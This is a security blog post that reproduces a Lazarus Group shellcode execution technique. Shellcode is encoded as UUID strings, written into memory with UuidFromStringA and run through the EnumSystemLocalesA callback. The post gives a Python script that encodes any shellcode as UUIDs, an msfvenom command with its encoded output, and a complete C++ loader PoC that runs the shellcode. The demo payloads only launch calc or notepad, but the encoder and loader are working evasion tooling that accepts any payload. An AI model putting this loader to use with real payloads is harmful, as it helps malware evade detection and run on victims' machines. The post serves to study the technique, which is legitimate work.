Shellcode Execution via EnumSystemLocalA
This post covers a shellcode execution technique that leverages the UuidFromStringA and EnumSystemLocalA APIs to load and execute shellcode

Background

NCCGroup published an excellent research article covering a mostly unknown shellcode execution technique that was being used as part of campaign which is believed to related to the Lazarus Group. The shellcode execution technique uses the UuidFromStringA and EnumSystemLocalA APIs to load shellcode into memory and then execute it. This approach avoids the use of suspicious API calls such as WriteProcessMemory , CreateThread and VirtualAlloc.
The full blog post from NCCGroup can be found here:
RIFT: Analysing a Lazarus Shellcode Execution Method
NCC Group Research
The rest of this blog post is about experimenting with the technique covered by NCCGroup. For the most part there is no additional insight/information than is already covered in the references blog post.

Technique Overview

The shellcode execution technique revolves around the following steps:
    1.
    Allocate Target Memory via HeapAlloc (or VirtualAlloc directly if you wanted to)
    2.
    Use UuidFromStringA to convert UUID strings their binary format and store in memory
    3.
    Use EnumSystemLocalA to execute the shellcode previously loaded into memory

HeapAlloc

HeapAlloc is a common API call to allocate a block of memory on the heap. My understanding of this API is that is allows you to allocate specific amount of memory on the heap, unlike the blocks of memory that you get by using the VirtualAlloc API. However, documentation suggests that HeapAlloc can still call VirtualAlloc itself if required.

UuidFromStringA

As noted in the NCCGroup blog post this API call:
Takes a pointer to a UUID, which will be used to return the converted binary data. By providing a pointer to an heap address, this function can be (ab)used to both decode data and write it to memory without using common functions such as memcpy or WriteProcessMemory
So by calling this API and providing a pointer to a memory address - instead of a pointer to a UUID - the resulting binary representation of the provided UUID will be stored in memory. By chaining a series of calls to this API together and providing specifically crafted UUIDs we can load our desired content (shellcode) into the specified memory region.
To examine how this works, we use the UUIDs used in the NCCGroup blog post as an example and decode them manually. We can run a quick and dirty python script to convert them into their binary representation:
1
#!/usr/bin/python3
2
import sys
3
from uuid import UUID
4
​
5
# UUIDs from NCC Blog Post
6
uuids = [
7
"6850c031-6163-636c-5459-504092741551",
8
"2f728b64-768b-8b0c-760c-ad8b308b7e18",
9
"1aeb50b2-60b2-2948-d465-488b32488b76",
10
"768b4818-4810-48ad-8b30-488b7e300357",
11
"175c8b3c-8b28-1f74-2048-01fe8b541f24",
12
"172cb70f-528d-ad02-813c-0757696e4575",
13
"1f748bef-481c-fe01-8b34-ae4801f799ff",
14
"000000d7-0000-0000-0000-000000000000",
15
]
16
​
17
output_file = open("/tmp/out.bin","wb")
18
for uuid in uuids:
19
output_file.write(UUID(uuid).bytes_le)
20
21
output_file.close()
Copied!
After running the script and opening the resulting output.bin file in radare2, we can see that it appears to be valid 64bit shellcode which will use the WinExec API to execute calc:
If you interested in what this shellcode does line by line you can find a commented version of the shellcode here.

EnumSystemLocalA

Now that we know how the shellcode is loaded into memory from the UUID strings, we can look at how the EnumSystemLocalA API call is utilised to execute the shellcode:
Looking at the documentation for the API call we can see that it essentially takes a pointer to a callback function. By providing the memory address of our shellcode we can use this function execute it.

Testing the Technique

Converting Shellcode to UUIDs

Now that we know how the technique works, we can pull together some PoC code. However, before we do that we need to be able to convert our desired shellcode into valid UUID strings. Fortunately this is easy to do with the following python code:
1
#!usr/bin/python3
2
​
3
from uuid import UUID
4
import sys
5
​
6
if len(sys.argv) < 2:
7
print("Usage: %s <shellcode_file>" % sys.argv[0])
8
sys.exit(1)
9
​
10
with open(sys.argv[1], "rb") as f:
11
# Read in 16 bytes from our input shellcode
12
chunk = f.read(16)
13
while chunk:
14
# If the chunk is less than 16 bytes then we pad the difference
15
if len(chunk) < 16:
16
padding = 16 - len(chunk)
17
chunk = chunk + (b"\x90" * padding)
18
print(UUID(bytes_le=chunk))
19
chunk = f.read(16)
Copied!
We can generate some example shellcode - which will execute notepad - by using msfvenom and then converting the shellcode into UUIDs using the python script above:
1
msfvenom -p windows/exec CMD=notepad -f raw -o /tmp/notepad_shellcode
2
[-] No platform was selected, choosing Msf::Module::Platform::Windows
3
[-] No arch selected, selecting arch: x86 from the payload
4
No encoder or badchars specified, outputting raw payload
5
Payload size: 192 bytes
6
Saved as: /tmp/notepad_shellcode
7
$
8
$ python3 /tmp/convert_to_uuid.py /tmp/notepad_shellcode
9
"0082e8fc-0000-8960-e531-c0648b50308b"
10
"528b0c52-8b14-2872-0fb7-4a2631ffac3c"
11
"2c027c61-c120-0dcf-01c7-e2f252578b52"
12
"3c4a8b10-4c8b-7811-e348-01d1518b5920"
13
"498bd301-e318-493a-8b34-8b01d631ffac"
14
"010dcfc1-38c7-75e0-f603-7df83b7d2475"
15
"588b58e4-0124-66d3-8b0c-4b8b581c01d3"
16
"018b048b-89d0-2444-245b-5b61595a51ff"
17
"5a5f5fe0-128b-8deb-5d6a-018d85b20000"
18
"31685000-6f8b-ff87-d5bb-f0b5a25668a6"
19
"ff9dbd95-3cd5-7c06-0a80-fbe07505bb47"
20
"6a6f7213-5300-d5ff-6e6f-746570616400"
Copied!

PoC Code

Now that we have our shellcode in UUID format, we can write our PoC code to test:
1
#include <iostream>
2
#include <Windows.h>
3
#include <Rpc.h>
4
​
5
#pragma comment(lib, "Rpcrt4.lib")
6
​
7
int Error(const char* msg) {
8
printf("%s (%u):", msg, GetLastError());
9
return 1;
10
}
11
​
12
int main()
13
{
14
// Shellcode as array of UUIDs
15
const char* uuid_arr[] =
16
{
17
"0082e8fc-0000-8960-e531-c0648b50308b",
18
"528b0c52-8b14-2872-0fb7-4a2631ffac3c",
19
"2c027c61-c120-0dcf-01c7-e2f252578b52",
20
"3c4a8b10-4c8b-7811-e348-01d1518b5920",
21
"498bd301-e318-493a-8b34-8b01d631ffac",
22
"010dcfc1-38c7-75e0-f603-7df83b7d2475",
23
"588b58e4-0124-66d3-8b0c-4b8b581c01d3",
24
"018b048b-89d0-2444-245b-5b61595a51ff",
25
"5a5f5fe0-128b-8deb-5d6a-018d85b20000",
26
"31685000-6f8b-ff87-d5bb-f0b5a25668a6",
27
"ff9dbd95-3cd5-7c06-0a80-fbe07505bb47",
28
"6a6f7213-5300-d5ff-6e6f-746570616400"
29
};
30
​
31
// Minimum allocation size for VirtualAlloc
32
SIZE_T alloc_size = 0x2000;
33
​
34
// Get a handle to the current process
35
int pid = GetCurrentProcessId();
36
HANDLE proc_handle = OpenProcess(PROCESS_VM_OPERATION,FALSE, pid);
37
if (!proc_handle)
38
Error("OpenProcess Failed");
39
40
// Allocate memory in current process to hold our shellcode
41
// Initial allocation is PAGE_READWRITE
42
void* mem = VirtualAllocEx(proc_handle, NULL, alloc_size, MEM_COMMIT, PAGE_READWRITE);
43
if (!mem)
44
Error("VirtualAlloc Failed");
45
46
DWORD_PTR mem_ptr = (DWORD_PTR)mem;
47
48
// Loop through our list of UUIDs and use UuidFromStringA
49
// to convert and load into memory
50
for (int count = 0; count < sizeof(uuid_arr) / sizeof(uuid_arr[0]); count++) {
51
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuid_arr[count], (UUID*)mem_ptr);
52
if (status != RPC_S_OK) {
53
CloseHandle(mem);
54
Error("UuidFromStringA Failed");
55
}
56
mem_ptr += 16;
57
}
58
59
MEMORY_BASIC_INFORMATION mem_info;
60
61
// Get a handle to the memory region containing our shellcode
62
// so we can change the page permission
63
VirtualQueryEx(proc_handle, mem, &mem_info, sizeof(mem_info));
64
65
// Use VirtualProtectEx to mark the memory region as executable
66
if(!VirtualProtectEx(proc_handle, mem, sizeof(mem), PAGE_EXECUTE_READ, &mem_info.Protect))
67
Error("VirtualProtect Failed");
68
​
69
// Execute our shellcode using EnumSystemLocalesA
70
if(EnumSystemLocalesA((LOCALE_ENUMPROCA)mem, 0) == 0)
71
Error("EnumSystemLocalesA Failed");
72
​
73
CloseHandle(mem);
74
}
Copied!
In the PoC code above we still use OpenProcess, VirtualAlloc and VirtualProtect which are typically viewed as suspicious. In the Lazarus samples these calls were replaced with a reference to HeapAlloc. The NCCGroup blog post contains code showing how this is done.
Compiling and executing our code shows that the technique is successful and notepad is successfully executed:

References

RIFT: Analysing a Lazarus Shellcode Execution Method
NCC Group Research
​
Last modified 8mo ago